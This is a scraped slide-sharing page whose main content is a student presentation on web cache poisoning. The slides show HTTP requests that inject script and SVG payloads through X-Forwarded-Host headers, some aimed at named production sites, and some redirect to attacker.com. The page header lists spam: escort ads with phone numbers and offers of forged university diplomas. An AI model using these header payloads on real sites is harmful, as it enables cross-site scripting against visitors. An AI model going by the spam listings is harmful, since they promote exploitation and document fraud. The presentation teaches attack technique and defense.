Elevate Your Business with Our IT Expertise in New Orleans
 
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
 
Q4-1-Illustrating-Hypothesis-Testing.pptx
Q4-1-Illustrating-Hypothesis-Testing.pptxQ4-1-Illustrating-Hypothesis-Testing.pptx
Q4-1-Illustrating-Hypothesis-Testing.pptx
 
Call Girls Near The Suryaa Hotel New Delhi 9873777170
Call Girls Near The Suryaa Hotel New Delhi 9873777170Call Girls Near The Suryaa Hotel New Delhi 9873777170
Call Girls Near The Suryaa Hotel New Delhi 9873777170
 
PHP-based rendering of TYPO3 Documentation
PHP-based rendering of TYPO3 DocumentationPHP-based rendering of TYPO3 Documentation
PHP-based rendering of TYPO3 Documentation
 
Top 10 Interactive Website Design Trends in 2024.pptx
Top 10 Interactive Website Design Trends in 2024.pptxTop 10 Interactive Website Design Trends in 2024.pptx
Top 10 Interactive Website Design Trends in 2024.pptx
 
Film cover research (1).pptxsdasdasdasdasdasa
Film cover research (1).pptxsdasdasdasdasdasaFilm cover research (1).pptxsdasdasdasdasdasa
Film cover research (1).pptxsdasdasdasdasdasa
 
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
 
Git and Github workshop GDSC MLRITM
Git and Github workshop GDSC MLRITMGit and Github workshop GDSC MLRITM
Git and Github workshop GDSC MLRITM
 
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
 
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
 
young call girls in Uttam Nagar🔝 9953056974 🔝 Delhi escort Service
young call girls in Uttam Nagar🔝 9953056974 🔝 Delhi escort Serviceyoung call girls in Uttam Nagar🔝 9953056974 🔝 Delhi escort Service
young call girls in Uttam Nagar🔝 9953056974 🔝 Delhi escort Service
 
Contact Rya Baby for Call Girls New Delhi
Contact Rya Baby for Call Girls New DelhiContact Rya Baby for Call Girls New Delhi
Contact Rya Baby for Call Girls New Delhi
 
Hot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort ServiceHot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort Service
 
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
 
SCM Symposium PPT Format Customer loyalty is predi
SCM Symposium PPT Format Customer loyalty is prediSCM Symposium PPT Format Customer loyalty is predi
SCM Symposium PPT Format Customer loyalty is predi
 
Magic exist by Marta Loveguard - presentation.pptx
Magic exist by Marta Loveguard - presentation.pptxMagic exist by Marta Loveguard - presentation.pptx
Magic exist by Marta Loveguard - presentation.pptx
 
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
 

Web Cache Poisoning

  • 2. About Me ● A neophyte ● Web enthusiast ● iAm NoT yEt wORkInG iAm sTiLl sTudiNg (◕‿◕)
  • 3. Overview ● What cache poisoning we are talking about? ● Quickly Recalling Caching ● Case Studies ● Practical Time ● Defense
  • 4. Web Cache Poisoning at a glance Web Cache Poisoning is NOT ● Web Cache Deception ● Browser Cache Poisoning ● Request Smuggling ● Response Splitting ● DNS Cache Poisoning
  • 7. Cache Keys GET /bootstrap.css HTTP/1.1 Host: example.com User-Agent: Chrome/71.0….Linux/4.15 Blah: … ● Cache Keys are used to uniquely identify cached object
  • 8. Unkeyed Inputs and key collison GET /some_page.html HTTP/1.1 Host: example.com User-Agent: Chrome/71.0…. Blah: … Cookie: language=english Blah: .. GET /some_page.html HTTP/1.1 Host: example.com User-Agent: Chrome/71.0…. Blah: … Cookie: language=hindi Blah: ..
  • 9. Request: GET /page.html HTTP/1.1 Host: example.com Blah: … Cookie: language=english Response: Blah… <title>Hello World</title> Blah... Request: GET /page.html HTTP/1.1 Host: example.com Blah: … Cookie: language=hindi Response: Blah… <title>नमस्ते दुननया</title> Blah...
  • 10. Request: GET /page.html HTTP/1.1 Host: example.com Blah: … Cookie: language=english Response: Blah… <title>Hello World</title> Blah... Request: GET /page.html HTTP/1.1 Host: example.com Blah: … Cookie: language=hindi Cached Response: Blah… <title>Hello World</title> Blah...
  • 11. How do we poison caches? ● Using unkeyed inputs like HTTP Headers ● Using Request Smuggling ● Using Response Splitting ➔ This presentation is focused on exploiting using HTTP Headers
  • 12. Approach to web cache poisoning
  • 13. Quick Example On Web Cache Poisoning
  • 14. A normal request Request: GET /login.php HTTP/1.1 Host: 191.168.56.101 Blah: … Response: Blah: ... <img src=”192.168.56.101/image.png” /> Blah...
  • 15. A funny request Request: GET /login.php HTTP/1.1 Host: 192.168.56.101 X-Forwarded-Host: lol“/><svg onload=’alert(1)’> Blah: ... Response: Blah: … <img src=”lol"/><svg onload='alert(1)'>/image.png” />
  • 16. We all like practicals, don’t we?
  • 18. Cached XSSed Response in redhat.com GET /en?dontpoisoneveryone=1 HTTP/1.1 Host: www.redhat.com X-Forwarded-Host: a."><script>alert(1)</script> HTTP/1.1 200 OK Cache-Control: public, no-cache Blah… <meta property="og:image" content="https://a."><script>alert(1)</script>"/>
  • 19. Discreet Poisoning ● We just poisoned the cache for https://redhat.com/en?dontpoisoneveryone=1 ● We need to be first to send the request whenever this cache expires in order to poison site’s legitimate users. ● We need to reverse engineer cache expiry system and crawl into documentation to figure out exact time the cached object will be expired.
  • 20. unity3d.com Request: GET / HTTP/1.1 Host: unity3d.com X-Host: portswigger-labs.net HTTP/1.1 200 OK Via: 1.1 varnish-v4 Age: 174 Cache-Control: public, max-age=1800 … <script src="https://portswigger- labs.net/sites/files/foo.js"></script>
  • 21. Selective Poisoning GET / HTTP/1.1 Host: redacted.com User-Agent: Mozilla/5.0 … Firefox/60.0 X-Forwarded-Host: a"><iframe onload=alert(1)> HTTP/1.1 200 OK X-Served-By: cache-lhr6335-LHR Vary: User-Agent, Accept-Encoding … <link rel="canonical" href="https://a">a<iframe onload=alert(1)> </iframe>
  • 22. DOM Poisoning Request: GET /dataset HTTP/1.1 Host: catalog.data.gov X-Forwarded-Host: canary Response: HTTP/1.1 200 OK Age: 32707 X-Cache: Hit from cloudfront … <body data-site-root="https://canary/">
  • 23. Request: GET /dataset HTTP/1.1 Host: catalog.data.gov X-Forwarded-Host: id.burpcollaborator.net Response: HTTP/1.1 200 OK Age: 32707 X-Cache: Hit from cloudfront … <body data-site- root="https://id.burpcollaborator.net/">
  • 24. Request: GET /api/i18n/es HTTP/1.1 Host: catalog.data.gov Response: HTTP/1.1 200 OK … {"Show more":"Mostrar más"}
  • 25. Request: GET /api/i18n/es HTTP/1.1 Host: portswigger-labs.net Response: HTTP/1.1 200 OK … {"Show more":"<svg onload=alert(1)>"}
  • 26. ● A cool feature to install addons in background for marketing purposes ● This feature became famous by forcefully installing Mr.Robot extension in background ● They were using Nginx for caching ● Mozilla sent a weird request which contained Origin header in all lowercase Mozilla SHIELD GET /api/v1/recipe/signed/ HTTP/1.1 Blah: ... origin: null Blah: ...
  • 27. Request: GET /api/v1/ HTTP/1.1 Host: normandy.cdn.mozilla.net X-Forwarded-Host: xyz.burpcollaborator.net HTTP/1.1 200 OK { ... "recipe-list": "https://xyz.burpcollaborator.net/a pi/v1/recipe/", "recipe-signed": "https://xyz.burpcollaborator.net/a pi/v1/recipe/signed/", ... }
  • 28. ● Signing was there so we couldn’t install any addon of our choice ● Backend mozilla systems that use unsigned recipes let us peek into system and might help us obtain signing key ● But we could still perform a DDoS ● We could install already signed addons
  • 29. Route Poisoning in goodhire.com ● Some applications dumbly use request headers to generate URLs and use them for routing :) ● goodhire.com is hosted on hubspot.com which is using cloudflare caching server.
  • 30. Route Poisoning in goodhire.com Request: GET / HTTP/1.1 Host: www.goodhire.com X-Forwarded-Server: canary Response: HTTP/1.1 404 Not Found CF-Cache-Status: MISS ... <title>HubSpot - Page not found</title> <p>The domain canary does not exist in our system.</p>
  • 31. Request: GET / HTTP/1.1 Host: www.goodhire.com X-Forwarded-Host: portswigger-labs- 4223616.hs-sites.com Response: HTTP/1.1 200 OK ... <script>alert(document.domain)</script>
  • 32. Hidden route poisoning ● This vulnerability was in blog.cloudflare.com which was using its own caching service ● blog.cloudflare.com is hosted using Ghost.
  • 33. A normal fail response Request: GET / HTTP/1.1 Host: blog.cloudflare.com X-Forwarded-Host: canary Response: HTTP/1.1 302 Found Location: https://ghost.org/fail/
  • 34. Supplying already hosted website Request: GET / HTTP/1.1 Host: blog.cloudflare.com X-Forwarded-Host: blog.binary.com Response: HTTP/1.1 200 OK Normal response Still No Luck :(
  • 35. B...bu….but what if we use a website hosted on ghost? Request: GET / HTTP/1.1 Host: blog.cloudflare.com X-Forwarded-Host: noshandnibble.ghost.io Response: HTTP/1.1 302 Found Location: http://noshandnibble.blog/
  • 36. How much damage can we do with it? ● Files that were cached a. jpg b. png c. pdf d. js e. css
  • 37. Bypassing mixed-content protection ● Mixed-content is when your website is HTTPS and is requesting some resource via HTTP. ● Browsers block this type of imports and this feature is called mixed-content protection. ● This redirect ghost did was an HTTP rather than HTTPS which was a big obstacle. Again stuck :/
  • 38. Luckily, bounty hunters helped ● Safari’s HSTS redirect automatically upgrades it to HTTPS ● HSTS is a technique which is used to prevent data from being eavesdropped by upgrading from HTTP to HTTPS. ● Edge’s 302 response completely bypasses mixed- content protection
  • 39. Chaining unkeyed inputs ● Sometimes, unkeyed inputs only confuse some part of application. ● We will need to chain unkeyed inputs in order to get something useful
  • 40. Request: GET /en HTTP/1.1 Host: redacted.net X-Forwarded-Host: xyz Response: HTTP/1.1 200 OK Set-Cookie: locale=en; domain=xyz Request 1
  • 41. Request: GET /en HTTP/1.1 Host: redacted.net X-Forwarded-Scheme: nothttps Response: HTTP/1.1 301 Moved Permanently Location: https://redacted.net/en Request 2
  • 42. Request 1 + Request 2 = WCP Request: GET /en HTTP/1.1 Host: redacted.net X-Forwarded-Host: attacker.com X-Forwarded-Scheme: nothttps Response: HTTP/1.1 301 Moved Permanently Location: https://attacker.com/en
  • 43. Open Graph Hijacking ● Here’s everyone’s favourite, facebook hacking! ● Open Graph is a protocol developed by Facebook which allows to integrate between facebook and other apps. ● But what if we cache some malicious page which will in turn share what we want to share? Let’s try it out.
  • 44. Request: GET /en HTTP/1.1 Host: redacted.net X-Forwarded-Host: attacker.com Response: HTTP/1.1 200 OK Cache-Control: max-age=0, private, must- revalidate … <meta property="og:url" content='https://attacker.com/en'/>
  • 46. Defense ● Do NOT use caching at all! ● Avoid taking input from headers. ● If do, then include them in cache key. ● Use burp active scanner or Param Miner like tools to find out unkeyed inputs.
  • 47. Thanks ● Connect with me ○ kuldeep.pandya.77799@Facebook ○ some_dank_boi@Instagram ○ Predator77799@Twitter